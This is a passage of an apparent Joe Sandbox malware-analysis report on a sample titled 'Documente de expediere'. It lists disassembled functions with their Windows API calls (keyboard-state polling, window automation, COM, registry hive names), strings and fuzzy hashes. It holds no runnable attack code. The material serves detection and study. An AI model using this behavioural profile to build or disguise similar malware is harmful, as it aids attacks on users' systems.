                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006CD8E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 2751501086-0
                                                • Opcode ID: 59d637d31a5c26f9fe2ff1c4a3aa949df286c724b083d1be37ba6342ae5a7f01
                                                • Instruction ID: 02e1f0a9b961ff5fbbb59c5e866d76f76332405cfc3ecb2b155d435d9d48ac2a
                                                • Opcode Fuzzy Hash: 59d637d31a5c26f9fe2ff1c4a3aa949df286c724b083d1be37ba6342ae5a7f01
                                                • Instruction Fuzzy Hash: 1D71D670601205BFEB219F14DC45FFABF6AFF05364F10422AF514A62D1CBB55861DBA4
                                                Function 00708BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00708BEC
                                                • CoInitialize.OLE32(00000000), ref: 00708C19
                                                • CoUninitialize.OLE32 ref: 00708C23
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00708D23
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00708E50
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00722C0C), ref: 00708E84
                                                • CoGetObject.OLE32(?,00000000,00722C0C,?), ref: 00708EA7
                                                • SetErrorMode.KERNEL32(00000000), ref: 00708EBA
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00708F3A
                                                • VariantClear.OLEAUT32(?), ref: 00708F4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID: ,,r
                                                • API String ID: 2395222682-1227627816
                                                • Opcode ID: ee784f2870b85f42270fd8b350a7ccb5468d93b304aeacbe2e6e1f117db717f8
                                                • Instruction ID: a3f58be70a6e33a7616a531978f75dedc7d244f7b46aae4065fa18e43f1fbf76
                                                • Opcode Fuzzy Hash: ee784f2870b85f42270fd8b350a7ccb5468d93b304aeacbe2e6e1f117db717f8
                                                • Instruction Fuzzy Hash: 7EC123B1208305EFD740DF68C88496BB7E9BF88748F004A6DF5899B291DB75ED05CB62
                                                Function 007110A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: 96a988453326c40ae821e428337fb430065e73ca1ad43545c06470272b051079
                                                • Instruction ID: 304b2e5dfd845bd8cd9bff889bb009adf02dc8ff55b1d729926310ce3bc317b9
                                                • Opcode Fuzzy Hash: 96a988453326c40ae821e428337fb430065e73ca1ad43545c06470272b051079
                                                • Instruction Fuzzy Hash: 2B41507021024E9BDF10EF98DC91AEB3725BF15300F908468ED915B2D1D778ED9ACB54
                                                Function 006F5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                  • Part of subcall function 00697A84: _memmove.LIBCMT ref: 00697B0D
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006F55D2
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006F55E8
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006F55F9
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006F560B
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006F561C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: 5ac81ac0b7534df902b5986a6fde0c0981507b2d72d95f4b0ad46feeb0c49412
                                                • Instruction ID: 932ced228a12ec322f48e3a472b7e9923801b6d70bcbd0f9abcc3bf47bda6432
                                                • Opcode Fuzzy Hash: 5ac81ac0b7534df902b5986a6fde0c0981507b2d72d95f4b0ad46feeb0c49412
                                                • Instruction Fuzzy Hash: E41194715A016D79DB20BB65CC4ADFF7B7DEF91F00F400469B511A20E1EF641D05C5A5
                                                Function 006F48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: d9f4206015bb3662e7bf7eea34f80f203bb7a2c794847daad96477e5172f3246
                                                • Instruction ID: 84f9b9565ef38b8349c611e9e0e80f107d62eab85158879a0509ce1b5fbaec46
                                                • Opcode Fuzzy Hash: d9f4206015bb3662e7bf7eea34f80f203bb7a2c794847daad96477e5172f3246
                                                • Instruction Fuzzy Hash: E111D571A08119AFCB20EB289C06EEB77AD9F01720F048179F60596191EFB49AC18765
                                                Function 006F5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • timeGetTime.WINMM ref: 006F521C
                                                  • Part of subcall function 006B0719: timeGetTime.WINMM(?,75A4B400,006A0FF9), ref: 006B071D
                                                • Sleep.KERNEL32(0000000A), ref: 006F5248
                                                • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 006F526C
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006F528E
                                                • SetActiveWindow.USER32 ref: 006F52AD
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006F52BB
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 006F52DA
                                                • Sleep.KERNEL32(000000FA), ref: 006F52E5
                                                • IsWindow.USER32 ref: 006F52F1
                                                • EndDialog.USER32(00000000), ref: 006F5302
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: a5adf3b2afa178f1961c55e227899d31b7a651ff9a654fc4e50bd993d47d75a6
                                                • Instruction ID: 1816aa94389e7c4427a59fd576a64fd8c83fd400524f5ffe87079aa017a29c7b
                                                • Opcode Fuzzy Hash: a5adf3b2afa178f1961c55e227899d31b7a651ff9a654fc4e50bd993d47d75a6
                                                • Instruction Fuzzy Hash: 53219571204708AFE7015B28FC89AF53B6BFB44347F00D528F302812B1EBA95D50D669
                                                Function 006FD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • CoInitialize.OLE32(00000000), ref: 006FD855
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006FD8E8
                                                • SHGetDesktopFolder.SHELL32(?), ref: 006FD8FC
                                                • CoCreateInstance.OLE32(00722D7C,00000000,00000001,0074A89C,?), ref: 006FD948
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006FD9B7
                                                • CoTaskMemFree.OLE32(?,?), ref: 006FDA0F
                                                • _memset.LIBCMT ref: 006FDA4C
                                                • SHBrowseForFolderW.SHELL32(?), ref: 006FDA88
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006FDAAB
                                                • CoTaskMemFree.OLE32(00000000), ref: 006FDAB2
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006FDAE9
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 006FDAEB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: d9e2e22c62a893d023f1de0a7ad668eda266db138c7fd0e0c08f89974bf190fc
                                                • Instruction ID: aae7ad7e9b27e8ca490bfec04a8fcf29c389083385b7e63a06a92079c3839de4
                                                • Opcode Fuzzy Hash: d9e2e22c62a893d023f1de0a7ad668eda266db138c7fd0e0c08f89974bf190fc
                                                • Instruction Fuzzy Hash: 92B10F75A00109AFDB44DFA9C885DAEBBFAFF48314B0484A9F909EB251DB30ED41CB54
                                                Function 006F052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 006F05A7
                                                • SetKeyboardState.USER32(?), ref: 006F0612
                                                • GetAsyncKeyState.USER32(000000A0), ref: 006F0632
                                                • GetKeyState.USER32(000000A0), ref: 006F0649
                                                • GetAsyncKeyState.USER32(000000A1), ref: 006F0678
                                                • GetKeyState.USER32(000000A1), ref: 006F0689
                                                • GetAsyncKeyState.USER32(00000011), ref: 006F06B5
                                                • GetKeyState.USER32(00000011), ref: 006F06C3
                                                • GetAsyncKeyState.USER32(00000012), ref: 006F06EC
                                                • GetKeyState.USER32(00000012), ref: 006F06FA
                                                • GetAsyncKeyState.USER32(0000005B), ref: 006F0723
                                                • GetKeyState.USER32(0000005B), ref: 006F0731
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
                                                • Instruction ID: aba8f35879f6ccf38d3ec61b5b49f6ec17f2e463133f5359056c2a2f9e7a2b0f
                                                • Opcode Fuzzy Hash: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
                                                • Instruction Fuzzy Hash: E851FD60A0478C59FF34DBA085547FABFB69F02380F08859DD7C25A2C3DAA49A4CCF55
                                                Function 006EC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 006EC746
                                                • GetWindowRect.USER32(00000000,?), ref: 006EC758
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006EC7B6
                                                • GetDlgItem.USER32(?,00000002), ref: 006EC7C1
                                                • GetWindowRect.USER32(00000000,?), ref: 006EC7D3
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006EC827
                                                • GetDlgItem.USER32(?,000003E9), ref: 006EC835
                                                • GetWindowRect.USER32(00000000,?), ref: 006EC846
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006EC889
                                                • GetDlgItem.USER32(?,000003EA), ref: 006EC897
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006EC8B4
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 006EC8C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
                                                • Instruction ID: 70e99869d0ca81e6e7b7b9749fc50e3a146e063d0d57339542e7d9fff4980683
                                                • Opcode Fuzzy Hash: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
                                                • Instruction Fuzzy Hash: F7513B71B00205AFDB18CFADDD99AAEBBBAEB88310F14C12DF516D62E0D7709D008B14
                                                Function 0069201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006920D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 0069216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 006CBEF6
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBF27
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBF3E
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBF5A
                                                • DeleteObject.GDI32(00000000), ref: 006CBF6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: 273186414bffd3e6e7a7de6d2cfa545587551d860df5c25f8ac12df3cf6bb9b0
                                                • Instruction ID: 4531bcfa4f56d0b42e935a221a96fc2bb0f60a73a9661ddb789f13bde54bc11b
                                                • Opcode Fuzzy Hash: 273186414bffd3e6e7a7de6d2cfa545587551d860df5c25f8ac12df3cf6bb9b0
                                                • Instruction Fuzzy Hash: CF617730100712EFCB259F18DD59BAAB7F6FB44312F50852CE55287AA0C7B9A891DF98
                                                Function 006921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                • GetSysColor.USER32(0000000F), ref: 006921D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: 00befb0916ee10b367ec8b92c6e9e90317273c51f77086aaaec705de626dcf23
                                                • Instruction ID: 6c043703a3069a47baf9b96505c2e7e4412e4962853cdb3685493b34b2a6d917
                                                • Opcode Fuzzy Hash: 00befb0916ee10b367ec8b92c6e9e90317273c51f77086aaaec705de626dcf23
                                                • Instruction Fuzzy Hash: 4B41D231004105BBDF255F28EC98BF93B6BEB06331F288265FD658A6E2C7358D42DB21
                                                Function 006FAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,0071F910), ref: 006FAB76
                                                • GetDriveTypeW.KERNEL32(00000061,0074A620,00000061), ref: 006FAC40
                                                • _wcscpy.LIBCMT ref: 006FAC6A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: c4d9606ecb18a896b356023a72c4e6f2f68f8895ab4ee303a90abcb8c44e4c60
                                                • Instruction ID: 072e0815c277c80b97cae04453001083e4e350f95b7595fff329acff165a6fae
                                                • Opcode Fuzzy Hash: c4d9606ecb18a896b356023a72c4e6f2f68f8895ab4ee303a90abcb8c44e4c60
                                                • Instruction Fuzzy Hash: 0651CFB01583059BC750EF58C881ABFB7ABEF80300F14882DF59A576A2DB319D4ACB57
                                                Function 0071C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                  • Part of subcall function 00692344: GetCursorPos.USER32(?), ref: 00692357
                                                  • Part of subcall function 00692344: ScreenToClient.USER32(007567B0,?), ref: 00692374
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0071C2E4
                                                • ImageList_EndDrag.COMCTL32 ref: 0071C2EA
                                                • ReleaseCapture.USER32 ref: 0071C2F0
                                                • SetWindowTextW.USER32(?,00000000), ref: 0071C39A
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0071C3AD
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0071C48F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$pru$pru
                                                • API String ID: 1924731296-3743244019
                                                • Opcode ID: 4b6932bc2392d0bd4941c5b4be4d4bf9efb788547abd8c274b7e56cb03295eb2
                                                • Instruction ID: 662cbb15ecc84bee89b5a0ce34108f9f4ceee9f972ffee6ddbe556510fb4ff84
                                                • Opcode Fuzzy Hash: 4b6932bc2392d0bd4941c5b4be4d4bf9efb788547abd8c274b7e56cb03295eb2
                                                • Instruction Fuzzy Hash: 7651A370208344AFDB04DF18CC56FAA7BE5FB88311F04852DF9558B2E1DB79A984CB56
                                                Function 00699997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                • Opcode ID: a7d7562260f195f5ba513ade2132648381c167fae0f888f503363d62882016f2
                                                • Instruction ID: 098825c509f9a18f1991bac7bffe227c5873113059527347eb13eda0c27f118f
                                                • Opcode Fuzzy Hash: a7d7562260f195f5ba513ade2132648381c167fae0f888f503363d62882016f2
                                                • Instruction Fuzzy Hash: 4A41E4B1604205AFEF24AF7CD842FBA77EFEB04300F24446EE549D7291EA719942CB21
                                                Function 007173C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007173D9
                                                • CreateMenu.USER32 ref: 007173F4
                                                • SetMenu.USER32(?,00000000), ref: 00717403
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00717490
                                                • IsMenu.USER32(?), ref: 007174A6
                                                • CreatePopupMenu.USER32 ref: 007174B0
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007174DD
                                                • DrawMenuBar.USER32 ref: 007174E5
                                                Strings
                                                Memory Dump Source
